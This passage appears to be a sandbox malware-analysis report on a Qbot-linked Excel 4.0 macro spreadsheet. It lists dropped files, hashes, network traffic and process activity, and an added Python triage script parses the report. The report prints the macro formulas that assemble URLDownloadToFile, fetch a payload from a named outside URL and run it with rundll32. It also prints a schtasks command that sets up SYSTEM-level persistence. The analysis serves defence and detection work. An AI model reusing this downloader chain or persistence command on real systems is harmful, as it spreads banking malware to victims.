                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 00:40:40 2021, atime=Wed Apr 7 00:40:40 2021, length=8192, window=hide
                                        Category:dropped
                                        Size (bytes):867
                                        Entropy (8bit):4.491798866881926
                                        Encrypted:false
                                        SSDEEP:12:85Q7qqmcLgXg/XAlCPCHaXtB8XzB/G89UNpX+Wnicvb4+bDtZ3YilMMEpxRljKFs:857ZK/XTd6j4DYelDv3qcrNru/
                                        MD5:D0ACDB5111CD883926D16D5B6B3D1FA9
                                        SHA1:44FDA7C5E6A87B048936036E1C0ED2A0DE270966
                                        SHA-256:5CC0C63AC47E1634E2A3874DB0D393FCBA46FBA323D54E255E71CA13518703DE
                                        SHA-512:5C102D8A55CBD05568F7A6A1CF77C51685B25779BC0C0CF18BE6D58F1AB367C653E316456A8B4725A0FE75179004051E97265E539717CC720E726C3A3EEAFC18
                                        Malicious:false
                                        Preview: L..................F...........7G..+.I.O+..+.I.O+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1055791644.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 00:40:40 2021, atime=Wed Apr 7 00:40:40 2021, length=323072, window=hide
                                        Category:dropped
                                        Size (bytes):4236
                                        Entropy (8bit):4.527464012505557
                                        Encrypted:false
                                        SSDEEP:96:8A/XojFY4cQh2A/XojFY4cQh2A/XojFY4cQh2A/XojFY4cQ/:8djFWQEdjFWQEdjFWQEdjFWQ/
                                        MD5:15A3C28F9DBDB4FBF1A0E954CD5E43CA
                                        SHA1:5046551E661056CB9E645D4225B63FD23EB6647D
                                        SHA-256:406037A2840E8447B83CAEEC4CA6538A06B925CD5E4A9E7C5A7128590A48DE00
                                        SHA-512:7184A2345E442143CE4CF19525CBA2F6B017947C9629D9430E3446C599A2471EC33A431F865C7D8A3898753E739544B730B6AE39C4372639938B949CCF758EA4
                                        Malicious:false
                                        Preview: L..................F.... ...jK.{..+.I.O+..L.Q.O+...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.0.5.5.7.9.1.6.4.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\document-1055791644.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.0.5.5.7.9.1.6.4.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N.
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):232
                                        Entropy (8bit):4.76735872684343
                                        Encrypted:false
                                        SSDEEP:6:dj6Y9LClTHSELClTH6Y9LClTHSELClTH6Y9LClTHSELClTH6Y9LClTHy:dmHc0Hc0Hc0HM
                                        MD5:508259E13350AC4C2097E410C9DA2739
                                        SHA1:0A08626E7D5172AB04DED25AF714B7370E431496
                                        SHA-256:76991574AF6C654CFCC618B4228B0913BCB3F9576E4834DA0FF7AEB5B92030CF
                                        SHA-512:8443458274F513C710376996D90B4E555DEFCBC83D96676D7E8914341BADADE91210016EA417A4F576E4170F047546C4A108EFEA3815C9869AC764C52F39903B
                                        Malicious:false
                                        Preview: Desktop.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..document-1055791644.LNK=0..[xls]..document-1055791644.LNK=0..
                                        C:\Users\user\Desktop\C7DE0000
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the preview begins with the same BIFF8 BOF record, 09 08 10 00, as the Workbook stream listed under Static OLE Info below, i.e. this is an Excel 97-2003 workbook image)
                                        Category:dropped
                                        Size (bytes):359638
                                        Entropy (8bit):7.418188194192143
                                        Encrypted:false
                                        SSDEEP:6144:xcKoSsxzNDZLDZjlbR868O8KL5L+od2xEtjPOtioVjDGUU1qfDlavx+W2QnAFVAI:LeLUIRfUI5uXL6nDJoF7os
                                        MD5:8A3AF2CC1CF26730C18E409488E63CCA
                                        SHA1:7B08720176AD62C6440E25B9DF4181C536502E76
                                        SHA-256:6FAC0F28ADE91347E64507A2A1BD9B56F24E70442D1B3ED34317907DAFA7EA3C
                                        SHA-512:E7485CB5D539795123970ED0B837A6A45D70725B353D8E32B9F9F57645890DEEACCC3F4218568ECE18A40302EC5997E223CB0A66B79E01919146376611330F92
                                        Malicious:false
                                        Preview: ........g2.........................\.p.... B.....a.........=...........................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...............
                                        C:\Users\user\iojhsfgv.dvers
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):701440
                                        Entropy (8bit):0.005573264919806617
                                        Encrypted:false
                                        SSDEEP:6:MxlEh/jKjXFeyclltAx1glItfvlyl/al//xYMXql1lC0lrULsolXQX8eef4f+8Az:OEh/G70yUQx1glnm/anlYlXQX8eFfiX
                                        MD5:DE9EB59161D48BFF791FD7788954E2DA
                                        SHA1:27B7FD5FB1BC5C8A6B64AC83CB631733CF35F99E
                                        SHA-256:9E6B6797944DD3EDD500BC13B5CDF9B74B9AFD215C9BED6EF3BEC26DB4396A7B
                                        SHA-512:0D575BCA4362DB030A68883FA76112A0221ED8D3A4324C4881BBCB4AAFBBDEBDB61542545C612488C3044B823BFCDC17DD1FCF0585D32BCC4784D327FB79986D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 5%
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Joe Sandbox View:
                                        • Filename: contract (39).xls, Detection: malicious
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...`......._.......`....@.................................................................................. ...........................c..................................................................................CODE.....O.......P.................. ..`DATA....(....`.......T..............@...BSS.....5............h...................idata........... ...h..............@....reloc...c.......d..................@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................................................................................................
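The entries above are the report's own dropped-file table. The Python below is an added example, not part of the Joe Sandbox report, that parses that Key:Value layout and applies the checks an analyst would run over it: a PE image served under a non-executable extension (0702[1].gif), a PE whose entropy is near zero because the body is almost entirely one byte value (iojhsfgv.dvers), a drop straight into the user profile root, and a downloaded file the sandbox marked malicious. SAMPLE_REPORT is a constructed excerpt made of three entries copied from the listing above and trimmed to the fields the rules use; the entropy threshold and the extension list are assumptions.

```python
"""Parse dropped-file entries from a Joe Sandbox report and triage them.

Added example, not code from the report or the sample.  SAMPLE_REPORT is a
constructed excerpt: three entries copied from the listing above, trimmed to
the fields the rules below use.
"""
import math
import re
from collections import Counter

# An entry starts with a Windows path on its own line; its fields follow as Key:Value.
RECORD_START = re.compile(r"^[A-Za-z]:\\")
# Extensions under which a PE image is expected (assumption: tune per environment).
EXECUTABLE_EXTENSIONS = {"exe", "dll", "sys", "scr", "ocx", "cpl", "drv"}
# A file sitting directly in C:\Users\<name>\, as the report's "user root directory" signature means.
USER_ROOT = re.compile(r"[A-Za-z]:\\Users\\[^\\]+\\[^\\]+")

SAMPLE_REPORT = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:downloaded
Size (bytes):701440
Entropy (8bit):6.569729430445502
Malicious:true
C:\Users\user\iojhsfgv.dvers
Process:C:\Windows\SysWOW64\explorer.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):701440
Entropy (8bit):0.005573264919806617
Malicious:true
C:\Users\user\AppData\Local\Temp\CabE310.tmp
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:dropped
Size (bytes):58596
Entropy (8bit):7.995478615012125
Malicious:false
"""


def shannon_entropy(data):
    """Entropy in bits per byte, the figure the report labels 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_dropped_files(text):
    """Return one dict per entry: {'Path': ..., 'File Type': ..., ...}."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if RECORD_START.match(line):
            current = {"Path": line}
            records.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return records


def triage(record):
    """Apply the triage rules to one entry and return the findings that fired."""
    findings = []
    path = record["Path"]
    name = path.rsplit("\\", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    is_pe = record.get("File Type", "").startswith("PE32")
    entropy = float(record.get("Entropy (8bit)", "nan"))  # nan compares False below
    if is_pe and ext not in EXECUTABLE_EXTENSIONS:
        findings.append("PE image with non-executable extension")
    if is_pe and entropy < 0.5:
        findings.append("near-zero entropy: PE body is almost entirely one byte value")
    if USER_ROOT.fullmatch(path):
        findings.append("dropped directly in the user profile root")
    if record.get("Category") == "downloaded" and record.get("Malicious") == "true":
        findings.append("downloaded payload flagged malicious")
    return findings


def triage_report(text):
    """Map each entry's path to its list of findings."""
    return {r["Path"]: triage(r) for r in parse_dropped_files(text)}


if __name__ == "__main__":
    for path, findings in triage_report(SAMPLE_REPORT).items():
        print(path, findings or "-")
```

The same parser runs unchanged over the full listing above if it is pasted into SAMPLE_REPORT; only the three entries with findings are included here to keep the sample short. shannon_entropy is there to make the near-zero figure concrete: a 1 KiB blob that is an MZ header followed by zeros scores about 0.02 bits per byte, which is the regime the 0.0056 of iojhsfgv.dvers falls in.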

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 8 08:27:11 2021, Security: 0
                                        Entropy (8bit):7.606120010244409
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 78.94%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                        File name:document-1055791644.xls
                                        File size:323072
                                        MD5:a1b03697f4c155ce81cbe1a4d8f87382
                                        SHA1:c38536b8b88cb657f63a5c3ceb83586bd95f1b4b
                                        SHA256:6083d754351ed13573a015a56de62a51d8755e4ada995406c89abdf5a85e7390
                                        SHA512:9e645189e9ec6e1e6a9faeb34a1c7575de8ec6ae425661b13ee99274b2752013342f46ba69068d18430c9f2354129015be19b59bbc102c66ad60f70c1981530d
                                        SSDEEP:6144:BcKoSsxzNDZLDZjlbR868O8KlVH33dq7uDphYHceXVhca+fMHLty/xcl8OR4PiAK:meLUIRfUI5uXL6nDJofE
                                        File Content Preview:........................>.......................u...........................p...q...r...s...t..................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea286a4b4bcb4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "document-1055791644.xls"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Excel
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:True
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1251 (Windows-1251, Cyrillic)
                                        Author:
                                        Last Saved By:
                                        Create Time:2006-09-16 00:00:00
                                        Last Saved Time:2021-02-08 08:27:11
                                        Creating Application:Microsoft Excel
                                        Security:0

                                        Document Summary

                                        Document Code Page:1251
                                        Thumbnail Scaling Desired:False
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504 (0x000E0000, i.e. Excel 14.0 / Excel 2010)

                                        Streams

                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.311136915093
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 96 00 00 00 02 00 00 00 e3 04 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.250980572468
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 2 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 311018
                                        General
                                        Stream Path:Workbook
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:311018
                                        Entropy:7.73725705111
                                        Base64 Encoded:True

                                        Macro 4.0 Code

                                        Non-empty cells of the hidden macro sheet, in sheet order (the original dump flattens every row of the sheet onto one line; empty cells omitted, CSV quoting removed):

                                        =AE13()
                                        =AA13()
                                        =CALL("UR"&AF21,AE19&AE20&AE21&AE22&AE23&AE24&AE25&AE26&AE27&AE28&AE29&AE30&AE31&AE32&AE33&AE34&AE35&AE14,"JJCCBB",0,A100,AF18,AF23,0)
                                        =FORMULA.ARRAY(AE17,AE14)
                                        =FORMULA.ARRAY(AH25&AH26&AH27&AH28&AH29&AH30&AH31,AF14)
                                        =FORMULA.ARRAY(AI25&AI26&AI27&AI28&AI29,AG14)
                                        =AB17()
                                        =AF13()
                                        =AG13()
                                        =AA10()
                                        =EXEC(AF14&"2 "&AF18&AG14&"egisterServer")
                                        A
                                        =HALT()
                                        ..\iojhsfgv.dvers

                                        Single-character cells, laid out as the three columns they occupy in the sheet (a fourth cell, LMon, sits beside the L of the first column):

                                        U
                                        R
                                        L        LMon
                                        D
                                        o
                                        w
                                        n        r        ,
                                        l        u        D
                                        o        n        l
                                        a        d        l
                                        d        l        R
                                        T        l
                                        o        3
                                        F
                                        i
                                        l
                                        e

                                        Read top to bottom, the three columns are the strings URLDownloadToFile, rundll3 and ,DllR, which the CALL and EXEC formulas above concatenate.

                                        https://tidymasters.com.au/ds/0702.gif

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Apr 6, 2021 18:40:39.593688011 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                        Apr 6, 2021 18:40:40.125211000 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                        Apr 6, 2021 18:40:41.017709970 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                        Apr 6, 2021 18:40:41.063716888 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                        Apr 6, 2021 18:40:41.069145918 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                        Apr 6, 2021 18:40:41.115091085 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                        Apr 6, 2021 18:40:41.677865982 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                        Apr 6, 2021 18:40:41.734606028 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                                        Apr 6, 2021 18:40:41.741173029 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                                        Apr 6, 2021 18:40:41.800092936 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Apr 6, 2021 18:40:39.593688011 CEST | 192.168.2.22 | 8.8.8.8 | 0x312a | Standard query (0) | tidymasters.com.au | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Apr 6, 2021 18:40:40.125211000 CEST | 8.8.8.8 | 192.168.2.22 | 0x312a | No error (0) | tidymasters.com.au | (none) | 103.50.162.157 | A (IP address) | IN (0x0001)

                                        HTTPS Packets

                                        Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                        Apr 6, 2021 18:40:40.479944944 CEST | 103.50.162.157 | 443 | 192.168.2.22 | 49165 | CN=mail.tidymasters.com.au | CN=R3, O=Let's Encrypt, C=US | Sun Feb 14 13:18:07 CET 2021 | Sat May 15 14:18:07 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
                                        (intermediate certificate in the same chain) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:18:40:37
                                        Start date:06/04/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                        Imagebase:0x13f270000
                                        File size:27641504 bytes
                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:44
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                                        Imagebase:0xff940000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:45
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                                        Imagebase:0xa80000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:18:40:47
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x540000
                                        File size:2972672 bytes
                                        MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:18:40:51
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
                                        Imagebase:0xd60000
                                        File size:179712 bytes
                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\taskeng.exe
                                        Wow64 process (32bit):false
                                        Commandline:taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service:
                                        Imagebase:0xff4c0000
                                        File size:464384 bytes
                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0xff3e0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0x1c0000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:42:00
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0xffce0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:42:00
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0x340000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Disassembly

                                        Code Analysis
